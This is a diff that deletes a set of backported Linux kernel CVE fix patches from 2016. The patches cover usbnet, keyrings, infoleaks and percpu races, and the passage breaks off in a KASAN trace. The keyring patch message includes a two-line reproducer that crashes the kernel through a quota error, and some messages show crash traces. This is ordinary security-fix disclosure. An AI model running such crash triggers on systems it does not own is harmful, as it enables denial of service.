- static int cdc_ncm_bind(struct usbnet *dev, struct usb_interface *intf)
- {
--	int ret;
--
- 	/* MBIM backwards compatible function? */
- 	if (cdc_ncm_select_altsetting(intf) != CDC_NCM_COMM_ALTSETTING_NCM)
- 		return -ENODEV;
-@@ -998,16 +996,7 @@ static int cdc_ncm_bind(struct usbnet *dev, struct usb_interface *intf)
- 	 * Additionally, generic NCM devices are assumed to accept arbitrarily
- 	 * placed NDP.
- 	 */
--	ret = cdc_ncm_bind_common(dev, intf, CDC_NCM_DATA_ALTSETTING_NCM, 0);
--
--	/*
--	 * We should get an event when network connection is "connected" or
--	 * "disconnected". Set network connection in "disconnected" state
--	 * (carrier is OFF) during attach, so the IP network stack does not
--	 * start IPv6 negotiation and more.
--	 */
--	usbnet_link_change(dev, 0, 0);
--	return ret;
-+	return cdc_ncm_bind_common(dev, intf, CDC_NCM_DATA_ALTSETTING_NCM, 0);
- }
- 
- static void cdc_ncm_align_tail(struct sk_buff *skb, size_t modulus, size_t remainder, size_t max)
-@@ -1590,7 +1579,8 @@ static void cdc_ncm_status(struct usbnet *dev, struct urb *urb)
- 
- static const struct driver_info cdc_ncm_info = {
- 	.description = "CDC NCM",
--	.flags = FLAG_POINTTOPOINT | FLAG_NO_SETINT | FLAG_MULTI_PACKET,
-+	.flags = FLAG_POINTTOPOINT | FLAG_NO_SETINT | FLAG_MULTI_PACKET
-+			| FLAG_LINK_INTR,
- 	.bind = cdc_ncm_bind,
- 	.unbind = cdc_ncm_unbind,
- 	.manage_power = usbnet_manage_power,
-@@ -1603,7 +1593,7 @@ static const struct driver_info cdc_ncm_info = {
- static const struct driver_info wwan_info = {
- 	.description = "Mobile Broadband Network Device",
- 	.flags = FLAG_POINTTOPOINT | FLAG_NO_SETINT | FLAG_MULTI_PACKET
--			| FLAG_WWAN,
-+			| FLAG_LINK_INTR | FLAG_WWAN,
- 	.bind = cdc_ncm_bind,
- 	.unbind = cdc_ncm_unbind,
- 	.manage_power = usbnet_manage_power,
-@@ -1616,7 +1606,7 @@ static const struct driver_info wwan_info = {
- static const struct driver_info wwan_noarp_info = {
- 	.description = "Mobile Broadband Network Device (NO ARP)",
- 	.flags = FLAG_POINTTOPOINT | FLAG_NO_SETINT | FLAG_MULTI_PACKET
--			| FLAG_WWAN | FLAG_NOARP,
-+			| FLAG_LINK_INTR | FLAG_WWAN | FLAG_NOARP,
- 	.bind = cdc_ncm_bind,
- 	.unbind = cdc_ncm_unbind,
- 	.manage_power = usbnet_manage_power,
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-3951/ANY/0002.patch b/Patches/Linux_CVEs/CVE-2016-3951/ANY/0002.patch
deleted file mode 100644
index 8e04b70b..00000000
--- a/Patches/Linux_CVEs/CVE-2016-3951/ANY/0002.patch
+++ /dev/null
@@ -1,39 +0,0 @@
-From 1666984c8625b3db19a9abc298931d35ab7bc64b Mon Sep 17 00:00:00 2001
-From: Oliver Neukum <oneukum@suse.com>
-Date: Mon, 7 Mar 2016 11:31:10 +0100
-Subject: usbnet: cleanup after bind() in probe()
-
-In case bind() works, but a later error forces bailing
-in probe() in error cases work and a timer may be scheduled.
-They must be killed. This fixes an error case related to
-the double free reported in
-http://www.spinics.net/lists/netdev/msg367669.html
-and needs to go on top of Linus' fix to cdc-ncm.
-
-Signed-off-by: Oliver Neukum <ONeukum@suse.com>
-Signed-off-by: David S. Miller <davem@davemloft.net>
----
- drivers/net/usb/usbnet.c | 7 +++++++
- 1 file changed, 7 insertions(+)
-
-diff --git a/drivers/net/usb/usbnet.c b/drivers/net/usb/usbnet.c
-index 0b0ba7e..1079812 100644
---- a/drivers/net/usb/usbnet.c
-+++ b/drivers/net/usb/usbnet.c
-@@ -1769,6 +1769,13 @@ out3:
- 	if (info->unbind)
- 		info->unbind (dev, udev);
- out1:
-+	/* subdrivers must undo all they did in bind() if they
-+	 * fail it, but we may fail later and a deferred kevent
-+	 * may trigger an error resubmitting itself and, worse,
-+	 * schedule a timer. So we kill it all just in case.
-+	 */
-+	cancel_work_sync(&dev->kevent);
-+	del_timer_sync(&dev->delay);
- 	free_netdev(net);
- out:
- 	return status;
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-4470/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-4470/ANY/0001.patch
deleted file mode 100644
index 0b6bc265..00000000
--- a/Patches/Linux_CVEs/CVE-2016-4470/ANY/0001.patch
+++ /dev/null
@@ -1,91 +0,0 @@
-From 38327424b40bcebe2de92d07312c89360ac9229a Mon Sep 17 00:00:00 2001
-From: Dan Carpenter <dan.carpenter@oracle.com>
-Date: Thu, 16 Jun 2016 15:48:57 +0100
-Subject: KEYS: potential uninitialized variable
-
-If __key_link_begin() failed then "edit" would be uninitialized.  I've
-added a check to fix that.
-
-This allows a random user to crash the kernel, though it's quite
-difficult to achieve.  There are three ways it can be done as the user
-would have to cause an error to occur in __key_link():
-
- (1) Cause the kernel to run out of memory.  In practice, this is difficult
-     to achieve without ENOMEM cropping up elsewhere and aborting the
-     attempt.
-
- (2) Revoke the destination keyring between the keyring ID being looked up
-     and it being tested for revocation.  In practice, this is difficult to
-     time correctly because the KEYCTL_REJECT function can only be used
-     from the request-key upcall process.  Further, users can only make use
-     of what's in /sbin/request-key.conf, though this does including a
-     rejection debugging test - which means that the destination keyring
-     has to be the caller's session keyring in practice.
-
- (3) Have just enough key quota available to create a key, a new session
-     keyring for the upcall and a link in the session keyring, but not then
-     sufficient quota to create a link in the nominated destination keyring
-     so that it fails with EDQUOT.
-
-The bug can be triggered using option (3) above using something like the
-following:
-
-	echo 80 >/proc/sys/kernel/keys/root_maxbytes
-	keyctl request2 user debug:fred negate @t
-
-The above sets the quota to something much lower (80) to make the bug
-easier to trigger, but this is dependent on the system.  Note also that
-the name of the keyring created contains a random number that may be
-between 1 and 10 characters in size, so may throw the test off by
-changing the amount of quota used.
-
-Assuming the failure occurs, something like the following will be seen:
-
-	kfree_debugcheck: out of range ptr 6b6b6b6b6b6b6b68h
-	------------[ cut here ]------------
-	kernel BUG at ../mm/slab.c:2821!
-	...
-	RIP: 0010:[<ffffffff811600f9>] kfree_debugcheck+0x20/0x25
-	RSP: 0018:ffff8804014a7de8  EFLAGS: 00010092
-	RAX: 0000000000000034 RBX: 6b6b6b6b6b6b6b68 RCX: 0000000000000000
-	RDX: 0000000000040001 RSI: 00000000000000f6 RDI: 0000000000000300
-	RBP: ffff8804014a7df0 R08: 0000000000000001 R09: 0000000000000000
-	R10: ffff8804014a7e68 R11: 0000000000000054 R12: 0000000000000202
-	R13: ffffffff81318a66 R14: 0000000000000000 R15: 0000000000000001
-	...
-	Call Trace:
-	  kfree+0xde/0x1bc
-	  assoc_array_cancel_edit+0x1f/0x36
-	  __key_link_end+0x55/0x63
-	  key_reject_and_link+0x124/0x155
-	  keyctl_reject_key+0xb6/0xe0
-	  keyctl_negate_key+0x10/0x12
-	  SyS_keyctl+0x9f/0xe7
-	  do_syscall_64+0x63/0x13a
-	  entry_SYSCALL64_slow_path+0x25/0x25
-
-Fixes: f70e2e06196a ('KEYS: Do preallocation for __key_link()')
-Signed-off-by: Dan Carpenter <dan.carpenter@oracle.com>
-Signed-off-by: David Howells <dhowells@redhat.com>
-cc: stable@vger.kernel.org
-Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
----
- security/keys/key.c | 2 +-
- 1 file changed, 1 insertion(+), 1 deletion(-)
-
-diff --git a/security/keys/key.c b/security/keys/key.c
-index bd5a272..346fbf2 100644
---- a/security/keys/key.c
-+++ b/security/keys/key.c
-@@ -597,7 +597,7 @@ int key_reject_and_link(struct key *key,
- 
- 	mutex_unlock(&key_construction_mutex);
- 
--	if (keyring)
-+	if (keyring && link_ret == 0)
- 		__key_link_end(keyring, &key->index_key, edit);
- 
- 	/* wake up anyone waiting for a key to be constructed */
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-4482/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-4482/ANY/0001.patch
deleted file mode 100644
index c22dfd4b..00000000
--- a/Patches/Linux_CVEs/CVE-2016-4482/ANY/0001.patch
+++ /dev/null
@@ -1,41 +0,0 @@
-From 681fef8380eb818c0b845fca5d2ab1dcbab114ee Mon Sep 17 00:00:00 2001
-From: Kangjie Lu <kangjielu@gmail.com>
-Date: Tue, 3 May 2016 16:32:16 -0400
-Subject: USB: usbfs: fix potential infoleak in devio
-MIME-Version: 1.0
-Content-Type: text/plain; charset=UTF-8
-Content-Transfer-Encoding: 8bit
-
-The stack object “ci” has a total size of 8 bytes. Its last 3 bytes
-are padding bytes which are not initialized and leaked to userland
-via “copy_to_user”.
-
-Signed-off-by: Kangjie Lu <kjlu@gatech.edu>
-Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
----
- drivers/usb/core/devio.c | 9 +++++----
- 1 file changed, 5 insertions(+), 4 deletions(-)
-
-diff --git a/drivers/usb/core/devio.c b/drivers/usb/core/devio.c
-index 73ce871..e9f5043 100644
---- a/drivers/usb/core/devio.c
-+++ b/drivers/usb/core/devio.c
-@@ -1316,10 +1316,11 @@ static int proc_getdriver(struct usb_dev_state *ps, void __user *arg)
- 
- static int proc_connectinfo(struct usb_dev_state *ps, void __user *arg)
- {
--	struct usbdevfs_connectinfo ci = {
--		.devnum = ps->dev->devnum,
--		.slow = ps->dev->speed == USB_SPEED_LOW
--	};
-+	struct usbdevfs_connectinfo ci;
-+
-+	memset(&ci, 0, sizeof(ci));
-+	ci.devnum = ps->dev->devnum;
-+	ci.slow = ps->dev->speed == USB_SPEED_LOW;
- 
- 	if (copy_to_user(arg, &ci, sizeof(ci)))
- 		return -EFAULT;
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-4486/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-4486/ANY/0001.patch
deleted file mode 100644
index cd795789..00000000
--- a/Patches/Linux_CVEs/CVE-2016-4486/ANY/0001.patch
+++ /dev/null
@@ -1,50 +0,0 @@
-From 5f8e44741f9f216e33736ea4ec65ca9ac03036e6 Mon Sep 17 00:00:00 2001
-From: Kangjie Lu <kangjielu@gmail.com>
-Date: Tue, 3 May 2016 16:46:24 -0400
-Subject: net: fix infoleak in rtnetlink
-MIME-Version: 1.0
-Content-Type: text/plain; charset=UTF-8
-Content-Transfer-Encoding: 8bit
-
-The stack object “map” has a total size of 32 bytes. Its last 4
-bytes are padding generated by compiler. These padding bytes are
-not initialized and sent out via “nla_put”.
-
-Signed-off-by: Kangjie Lu <kjlu@gatech.edu>
-Signed-off-by: David S. Miller <davem@davemloft.net>
----
- net/core/rtnetlink.c | 18 ++++++++++--------
- 1 file changed, 10 insertions(+), 8 deletions(-)
-
-diff --git a/net/core/rtnetlink.c b/net/core/rtnetlink.c
-index a75f7e9..65763c2 100644
---- a/net/core/rtnetlink.c
-+++ b/net/core/rtnetlink.c
-@@ -1180,14 +1180,16 @@ static noinline_for_stack int rtnl_fill_vfinfo(struct sk_buff *skb,
- 
- static int rtnl_fill_link_ifmap(struct sk_buff *skb, struct net_device *dev)
- {
--	struct rtnl_link_ifmap map = {
--		.mem_start   = dev->mem_start,
--		.mem_end     = dev->mem_end,
--		.base_addr   = dev->base_addr,
--		.irq         = dev->irq,
--		.dma         = dev->dma,
--		.port        = dev->if_port,
--	};
-+	struct rtnl_link_ifmap map;
-+
-+	memset(&map, 0, sizeof(map));
-+	map.mem_start   = dev->mem_start;
-+	map.mem_end     = dev->mem_end;
-+	map.base_addr   = dev->base_addr;
-+	map.irq         = dev->irq;
-+	map.dma         = dev->dma;
-+	map.port        = dev->if_port;
-+
- 	if (nla_put(skb, IFLA_MAP, sizeof(map), &map))
- 		return -EMSGSIZE;
- 
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-4569/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-4569/ANY/0001.patch
deleted file mode 100644
index 853cd474..00000000
--- a/Patches/Linux_CVEs/CVE-2016-4569/ANY/0001.patch
+++ /dev/null
@@ -1,33 +0,0 @@
-From cec8f96e49d9be372fdb0c3836dcf31ec71e457e Mon Sep 17 00:00:00 2001
-From: Kangjie Lu <kangjielu@gmail.com>
-Date: Tue, 3 May 2016 16:44:07 -0400
-Subject: ALSA: timer: Fix leak in SNDRV_TIMER_IOCTL_PARAMS
-MIME-Version: 1.0
-Content-Type: text/plain; charset=UTF-8
-Content-Transfer-Encoding: 8bit
-
-The stack object “tread” has a total size of 32 bytes. Its field
-“event” and “val” both contain 4 bytes padding. These 8 bytes
-padding bytes are sent to user without being initialized.
-
-Signed-off-by: Kangjie Lu <kjlu@gatech.edu>
-Signed-off-by: Takashi Iwai <tiwai@suse.de>
----
- sound/core/timer.c | 1 +
- 1 file changed, 1 insertion(+)
-
-diff --git a/sound/core/timer.c b/sound/core/timer.c
-index 0cfc028..306a93d 100644
---- a/sound/core/timer.c
-+++ b/sound/core/timer.c
-@@ -1737,6 +1737,7 @@ static int snd_timer_user_params(struct file *file,
- 	if (tu->timeri->flags & SNDRV_TIMER_IFLG_EARLY_EVENT) {
- 		if (tu->tread) {
- 			struct snd_timer_tread tread;
-+			memset(&tread, 0, sizeof(tread));
- 			tread.event = SNDRV_TIMER_EVENT_EARLY;
- 			tread.tstamp.tv_sec = 0;
- 			tread.tstamp.tv_nsec = 0;
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-4578/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-4578/ANY/0001.patch
deleted file mode 100644
index 89b9c4ec..00000000
--- a/Patches/Linux_CVEs/CVE-2016-4578/ANY/0001.patch
+++ /dev/null
@@ -1,33 +0,0 @@
-From e4ec8cc8039a7063e24204299b462bd1383184a5 Mon Sep 17 00:00:00 2001
-From: Kangjie Lu <kangjielu@gmail.com>
-Date: Tue, 3 May 2016 16:44:32 -0400
-Subject: ALSA: timer: Fix leak in events via snd_timer_user_tinterrupt
-MIME-Version: 1.0
-Content-Type: text/plain; charset=UTF-8
-Content-Transfer-Encoding: 8bit
-
-The stack object “r1” has a total size of 32 bytes. Its field
-“event” and “val” both contain 4 bytes padding. These 8 bytes
-padding bytes are sent to user without being initialized.
-
-Signed-off-by: Kangjie Lu <kjlu@gatech.edu>
-Signed-off-by: Takashi Iwai <tiwai@suse.de>
----
- sound/core/timer.c | 1 +
- 1 file changed, 1 insertion(+)
-
-diff --git a/sound/core/timer.c b/sound/core/timer.c
-index cc3c08d..e722022 100644
---- a/sound/core/timer.c
-+++ b/sound/core/timer.c
-@@ -1266,6 +1266,7 @@ static void snd_timer_user_tinterrupt(struct snd_timer_instance *timeri,
- 	}
- 	if ((tu->filter & (1 << SNDRV_TIMER_EVENT_RESOLUTION)) &&
- 	    tu->last_resolution != resolution) {
-+		memset(&r1, 0, sizeof(r1));
- 		r1.event = SNDRV_TIMER_EVENT_RESOLUTION;
- 		r1.tstamp = tstamp;
- 		r1.val = resolution;
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-4578/ANY/0002.patch b/Patches/Linux_CVEs/CVE-2016-4578/ANY/0002.patch
deleted file mode 100644
index ca174f91..00000000
--- a/Patches/Linux_CVEs/CVE-2016-4578/ANY/0002.patch
+++ /dev/null
@@ -1,33 +0,0 @@
-From 9a47e9cff994f37f7f0dbd9ae23740d0f64f9fe6 Mon Sep 17 00:00:00 2001
-From: Kangjie Lu <kangjielu@gmail.com>
-Date: Tue, 3 May 2016 16:44:20 -0400
-Subject: ALSA: timer: Fix leak in events via snd_timer_user_ccallback
-MIME-Version: 1.0
-Content-Type: text/plain; charset=UTF-8
-Content-Transfer-Encoding: 8bit
-
-The stack object “r1” has a total size of 32 bytes. Its field
-“event” and “val” both contain 4 bytes padding. These 8 bytes
-padding bytes are sent to user without being initialized.
-
-Signed-off-by: Kangjie Lu <kjlu@gatech.edu>
-Signed-off-by: Takashi Iwai <tiwai@suse.de>
----
- sound/core/timer.c | 1 +
- 1 file changed, 1 insertion(+)
-
-diff --git a/sound/core/timer.c b/sound/core/timer.c
-index 306a93d..cc3c08d 100644
---- a/sound/core/timer.c
-+++ b/sound/core/timer.c
-@@ -1223,6 +1223,7 @@ static void snd_timer_user_ccallback(struct snd_timer_instance *timeri,
- 		tu->tstamp = *tstamp;
- 	if ((tu->filter & (1 << event)) == 0 || !tu->tread)
- 		return;
-+	memset(&r1, 0, sizeof(r1));
- 	r1.event = event;
- 	r1.tstamp = *tstamp;
- 	r1.val = resolution;
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-4794/3.18+/0001.patch b/Patches/Linux_CVEs/CVE-2016-4794/3.18+/0001.patch
deleted file mode 100644
index 92a1bcb5..00000000
--- a/Patches/Linux_CVEs/CVE-2016-4794/3.18+/0001.patch
+++ /dev/null
@@ -1,107 +0,0 @@
-From 6710e594f71ccaad8101bc64321152af7cd9ea28 Mon Sep 17 00:00:00 2001
-From: Tejun Heo <tj@kernel.org>
-Date: Wed, 25 May 2016 11:48:25 -0400
-Subject: percpu: fix synchronization between synchronous map extension and
- chunk destruction
-
-For non-atomic allocations, pcpu_alloc() can try to extend the area
-map synchronously after dropping pcpu_lock; however, the extension
-wasn't synchronized against chunk destruction and the chunk might get
-freed while extension is in progress.
-
-This patch fixes the bug by putting most of non-atomic allocations
-under pcpu_alloc_mutex to synchronize against pcpu_balance_work which
-is responsible for async chunk management including destruction.
-
-Signed-off-by: Tejun Heo <tj@kernel.org>
-Reported-and-tested-by: Alexei Starovoitov <alexei.starovoitov@gmail.com>
-Reported-by: Vlastimil Babka <vbabka@suse.cz>
-Reported-by: Sasha Levin <sasha.levin@oracle.com>
-Cc: stable@vger.kernel.org # v3.18+
-Fixes: 1a4d76076cda ("percpu: implement asynchronous chunk population")
----
- mm/percpu.c | 16 ++++++++--------
- 1 file changed, 8 insertions(+), 8 deletions(-)
-
-diff --git a/mm/percpu.c b/mm/percpu.c
-index b1d2a38..9903830 100644
---- a/mm/percpu.c
-+++ b/mm/percpu.c
-@@ -162,7 +162,7 @@ static struct pcpu_chunk *pcpu_reserved_chunk;
- static int pcpu_reserved_chunk_limit;
- 
- static DEFINE_SPINLOCK(pcpu_lock);	/* all internal data structures */
--static DEFINE_MUTEX(pcpu_alloc_mutex);	/* chunk create/destroy, [de]pop */
-+static DEFINE_MUTEX(pcpu_alloc_mutex);	/* chunk create/destroy, [de]pop, map ext */
- 
- static struct list_head *pcpu_slot __read_mostly; /* chunk list slots */
- 
-@@ -444,6 +444,8 @@ static int pcpu_extend_area_map(struct pcpu_chunk *chunk, int new_alloc)
- 	size_t old_size = 0, new_size = new_alloc * sizeof(new[0]);
- 	unsigned long flags;
- 
-+	lockdep_assert_held(&pcpu_alloc_mutex);
-+
- 	new = pcpu_mem_zalloc(new_size);
- 	if (!new)
- 		return -ENOMEM;
-@@ -890,6 +892,9 @@ static void __percpu *pcpu_alloc(size_t size, size_t align, bool reserved,
- 		return NULL;
- 	}
- 
-+	if (!is_atomic)
-+		mutex_lock(&pcpu_alloc_mutex);
-+
- 	spin_lock_irqsave(&pcpu_lock, flags);
- 
- 	/* serve reserved allocations from the reserved chunk if available */
-@@ -962,12 +967,9 @@ restart:
- 	if (is_atomic)
- 		goto fail;
- 
--	mutex_lock(&pcpu_alloc_mutex);
--
- 	if (list_empty(&pcpu_slot[pcpu_nr_slots - 1])) {
- 		chunk = pcpu_create_chunk();
- 		if (!chunk) {
--			mutex_unlock(&pcpu_alloc_mutex);
- 			err = "failed to allocate new chunk";
- 			goto fail;
- 		}
-@@ -978,7 +980,6 @@ restart:
- 		spin_lock_irqsave(&pcpu_lock, flags);
- 	}
- 
--	mutex_unlock(&pcpu_alloc_mutex);
- 	goto restart;
- 
- area_found:
-@@ -988,8 +989,6 @@ area_found:
- 	if (!is_atomic) {
- 		int page_start, page_end, rs, re;
- 
--		mutex_lock(&pcpu_alloc_mutex);
--
- 		page_start = PFN_DOWN(off);
- 		page_end = PFN_UP(off + size);
- 
-@@ -1000,7 +999,6 @@ area_found:
- 
- 			spin_lock_irqsave(&pcpu_lock, flags);
- 			if (ret) {
--				mutex_unlock(&pcpu_alloc_mutex);
- 				pcpu_free_area(chunk, off, &occ_pages);
- 				err = "failed to populate";
- 				goto fail_unlock;
-@@ -1040,6 +1038,8 @@ fail:
- 		/* see the flag handling in pcpu_blance_workfn() */
- 		pcpu_atomic_alloc_failed = true;
- 		pcpu_schedule_balance_work();
-+	} else {
-+		mutex_unlock(&pcpu_alloc_mutex);
- 	}
- 	return NULL;
- }
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-4794/3.18+/0002.patch b/Patches/Linux_CVEs/CVE-2016-4794/3.18+/0002.patch
deleted file mode 100644
index 6ab2f0a9..00000000
--- a/Patches/Linux_CVEs/CVE-2016-4794/3.18+/0002.patch
+++ /dev/null
@@ -1,156 +0,0 @@
-From 4f996e234dad488e5d9ba0858bc1bae12eff82c3 Mon Sep 17 00:00:00 2001
-From: Tejun Heo <tj@kernel.org>
-Date: Wed, 25 May 2016 11:48:25 -0400
-Subject: percpu: fix synchronization between chunk->map_extend_work and chunk
- destruction
-
-Atomic allocations can trigger async map extensions which is serviced
-by chunk->map_extend_work.  pcpu_balance_work which is responsible for
-destroying idle chunks wasn't synchronizing properly against
-chunk->map_extend_work and may end up freeing the chunk while the work
-item is still in flight.
-
-This patch fixes the bug by rolling async map extension operations
-into pcpu_balance_work.
-
-Signed-off-by: Tejun Heo <tj@kernel.org>
-Reported-and-tested-by: Alexei Starovoitov <alexei.starovoitov@gmail.com>
-Reported-by: Vlastimil Babka <vbabka@suse.cz>
-Reported-by: Sasha Levin <sasha.levin@oracle.com>
-Cc: stable@vger.kernel.org # v3.18+
-Fixes: 9c824b6a172c ("percpu: make sure chunk->map array has available space")
----
- mm/percpu.c | 57 ++++++++++++++++++++++++++++++++++++---------------------
- 1 file changed, 36 insertions(+), 21 deletions(-)
-
-diff --git a/mm/percpu.c b/mm/percpu.c
-index 0c59684..b1d2a38 100644
---- a/mm/percpu.c
-+++ b/mm/percpu.c
-@@ -112,7 +112,7 @@ struct pcpu_chunk {
- 	int			map_used;	/* # of map entries used before the sentry */
- 	int			map_alloc;	/* # of map entries allocated */
- 	int			*map;		/* allocation map */
--	struct work_struct	map_extend_work;/* async ->map[] extension */
-+	struct list_head	map_extend_list;/* on pcpu_map_extend_chunks */
- 
- 	void			*data;		/* chunk data */
- 	int			first_free;	/* no free below this */
-@@ -166,6 +166,9 @@ static DEFINE_MUTEX(pcpu_alloc_mutex);	/* chunk create/destroy, [de]pop */
- 
- static struct list_head *pcpu_slot __read_mostly; /* chunk list slots */
- 
-+/* chunks which need their map areas extended, protected by pcpu_lock */
-+static LIST_HEAD(pcpu_map_extend_chunks);
-+
- /*
-  * The number of empty populated pages, protected by pcpu_lock.  The
-  * reserved chunk doesn't contribute to the count.
-@@ -395,13 +398,19 @@ static int pcpu_need_to_extend(struct pcpu_chunk *chunk, bool is_atomic)
- {
- 	int margin, new_alloc;
- 
-+	lockdep_assert_held(&pcpu_lock);
-+
- 	if (is_atomic) {
- 		margin = 3;
- 
- 		if (chunk->map_alloc <
--		    chunk->map_used + PCPU_ATOMIC_MAP_MARGIN_LOW &&
--		    pcpu_async_enabled)
--			schedule_work(&chunk->map_extend_work);
-+		    chunk->map_used + PCPU_ATOMIC_MAP_MARGIN_LOW) {
-+			if (list_empty(&chunk->map_extend_list)) {
-+				list_add_tail(&chunk->map_extend_list,
-+					      &pcpu_map_extend_chunks);
-+				pcpu_schedule_balance_work();
-+			}
-+		}
- 	} else {
- 		margin = PCPU_ATOMIC_MAP_MARGIN_HIGH;
- 	}
-@@ -467,20 +476,6 @@ out_unlock:
- 	return 0;
- }
- 
--static void pcpu_map_extend_workfn(struct work_struct *work)
--{
--	struct pcpu_chunk *chunk = container_of(work, struct pcpu_chunk,
--						map_extend_work);
--	int new_alloc;
--
--	spin_lock_irq(&pcpu_lock);
--	new_alloc = pcpu_need_to_extend(chunk, false);
--	spin_unlock_irq(&pcpu_lock);
--
--	if (new_alloc)
--		pcpu_extend_area_map(chunk, new_alloc);
--}
--
- /**
-  * pcpu_fit_in_area - try to fit the requested allocation in a candidate area
-  * @chunk: chunk the candidate area belongs to
-@@ -740,7 +735,7 @@ static struct pcpu_chunk *pcpu_alloc_chunk(void)
- 	chunk->map_used = 1;
- 
- 	INIT_LIST_HEAD(&chunk->list);
--	INIT_WORK(&chunk->map_extend_work, pcpu_map_extend_workfn);
-+	INIT_LIST_HEAD(&chunk->map_extend_list);
- 	chunk->free_size = pcpu_unit_size;
- 	chunk->contig_hint = pcpu_unit_size;
- 
-@@ -1129,6 +1124,7 @@ static void pcpu_balance_workfn(struct work_struct *work)
- 		if (chunk == list_first_entry(free_head, struct pcpu_chunk, list))
- 			continue;
- 
-+		list_del_init(&chunk->map_extend_list);
- 		list_move(&chunk->list, &to_free);
- 	}
- 
-@@ -1146,6 +1142,25 @@ static void pcpu_balance_workfn(struct work_struct *work)
- 		pcpu_destroy_chunk(chunk);
- 	}
- 
-+	/* service chunks which requested async area map extension */
-+	do {
-+		int new_alloc = 0;
-+
-+		spin_lock_irq(&pcpu_lock);
-+
-+		chunk = list_first_entry_or_null(&pcpu_map_extend_chunks,
-+					struct pcpu_chunk, map_extend_list);
-+		if (chunk) {
-+			list_del_init(&chunk->map_extend_list);
-+			new_alloc = pcpu_need_to_extend(chunk, false);
-+		}
-+
-+		spin_unlock_irq(&pcpu_lock);
-+
-+		if (new_alloc)
-+			pcpu_extend_area_map(chunk, new_alloc);
-+	} while (chunk);
-+
- 	/*
- 	 * Ensure there are certain number of free populated pages for
- 	 * atomic allocs.  Fill up from the most packed so that atomic
-@@ -1644,7 +1659,7 @@ int __init pcpu_setup_first_chunk(const struct pcpu_alloc_info *ai,
- 	 */
- 	schunk = memblock_virt_alloc(pcpu_chunk_struct_size, 0);
- 	INIT_LIST_HEAD(&schunk->list);
--	INIT_WORK(&schunk->map_extend_work, pcpu_map_extend_workfn);
-+	INIT_LIST_HEAD(&schunk->map_extend_list);
- 	schunk->base_addr = base_addr;
- 	schunk->map = smap;
- 	schunk->map_alloc = ARRAY_SIZE(smap);
-@@ -1673,7 +1688,7 @@ int __init pcpu_setup_first_chunk(const struct pcpu_alloc_info *ai,
- 	if (dyn_size) {
- 		dchunk = memblock_virt_alloc(pcpu_chunk_struct_size, 0);
- 		INIT_LIST_HEAD(&dchunk->list);
--		INIT_WORK(&dchunk->map_extend_work, pcpu_map_extend_workfn);
-+		INIT_LIST_HEAD(&dchunk->map_extend_list);
- 		dchunk->base_addr = base_addr;
- 		dchunk->map = dmap;
- 		dchunk->map_alloc = ARRAY_SIZE(dmap);
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-4805/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-4805/ANY/0001.patch
deleted file mode 100644
index 21930a35..00000000
--- a/Patches/Linux_CVEs/CVE-2016-4805/ANY/0001.patch
+++ /dev/null
@@ -1,149 +0,0 @@
-From 1f461dcdd296eecedaffffc6bae2bfa90bd7eb89 Mon Sep 17 00:00:00 2001
-From: Guillaume Nault <g.nault@alphalink.fr>
-Date: Wed, 23 Mar 2016 16:38:55 +0100
-Subject: ppp: take reference on channels netns
-
-Let channels hold a reference on their network namespace.
-Some channel types, like ppp_async and ppp_synctty, can have their
-userspace controller running in a different namespace. Therefore they
-can't rely on them to preclude their netns from being removed from
-under them.
-
-==================================================================
-BUG: KASAN: use-after-free in ppp_unregister_channel+0x372/0x3a0 at
-addr ffff880064e217e0
-Read of size 8 by task syz-executor/11581
-=============================================================================
-BUG net_namespace (Not tainted): kasan: bad access detected
------------------------------------------------------------------------------
-
-Disabling lock debugging due to kernel taint
-INFO: Allocated in copy_net_ns+0x6b/0x1a0 age=92569 cpu=3 pid=6906
-[<      none      >] ___slab_alloc+0x4c7/0x500 kernel/mm/slub.c:2440
-[<      none      >] __slab_alloc+0x4c/0x90 kernel/mm/slub.c:2469
-[<     inline     >] slab_alloc_node kernel/mm/slub.c:2532
-[<     inline     >] slab_alloc kernel/mm/slub.c:2574
-[<      none      >] kmem_cache_alloc+0x23a/0x2b0 kernel/mm/slub.c:2579
-[<     inline     >] kmem_cache_zalloc kernel/include/linux/slab.h:597
-[<     inline     >] net_alloc kernel/net/core/net_namespace.c:325
-[<      none      >] copy_net_ns+0x6b/0x1a0 kernel/net/core/net_namespace.c:360
-[<      none      >] create_new_namespaces+0x2f6/0x610 kernel/kernel/nsproxy.c:95
-[<      none      >] copy_namespaces+0x297/0x320 kernel/kernel/nsproxy.c:150
-[<      none      >] copy_process.part.35+0x1bf4/0x5760 kernel/kernel/fork.c:1451
-[<     inline     >] copy_process kernel/kernel/fork.c:1274
-[<      none      >] _do_fork+0x1bc/0xcb0 kernel/kernel/fork.c:1723
-[<     inline     >] SYSC_clone kernel/kernel/fork.c:1832
-[<      none      >] SyS_clone+0x37/0x50 kernel/kernel/fork.c:1826
-[<      none      >] entry_SYSCALL_64_fastpath+0x16/0x7a kernel/arch/x86/entry/entry_64.S:185
-
-INFO: Freed in net_drop_ns+0x67/0x80 age=575 cpu=2 pid=2631
-[<      none      >] __slab_free+0x1fc/0x320 kernel/mm/slub.c:2650
-[<     inline     >] slab_free kernel/mm/slub.c:2805
-[<      none      >] kmem_cache_free+0x2a0/0x330 kernel/mm/slub.c:2814
-[<     inline     >] net_free kernel/net/core/net_namespace.c:341
-[<      none      >] net_drop_ns+0x67/0x80 kernel/net/core/net_namespace.c:348
